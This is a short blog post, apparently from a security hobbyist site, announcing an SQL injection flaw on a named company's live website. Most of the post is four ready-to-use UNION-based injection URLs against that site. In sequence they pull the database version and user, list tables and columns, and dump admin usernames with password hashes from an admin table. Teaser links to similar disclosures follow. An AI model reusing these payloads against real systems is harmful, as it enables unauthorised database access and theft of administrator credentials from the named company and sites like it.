PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies

These are some information from Vulneral Site http://www.kmd.com.sg :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

tbl

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

col

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

SQL injection (vulnerability) on Myanmar Climate Change Watch http://www.tunlwin.com/

PlanetCreator reported another critical SQL injection (vulnerability) on Myanmar Climate Change Watch http://www.tunlwin.com/ SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer

Open University Malaysia (OUM)’s Web Vulnerability

PlanetCreator had informed OUM’s XSS Vulnerability CODE http://www.planetcreator.net/2009/11/critical-xss-vulnerability-on-open-university-malaysia/ But nobody cares , How come they all wana do like this so shit! Where is OUM’s Wemaster? Sleeping @ Camp? Yeah,

Preventing ID Theft

Identity theft is the intentional use or theft of a person’s private information to obtain goods or services from another entity. “Private” information is the facts about you that are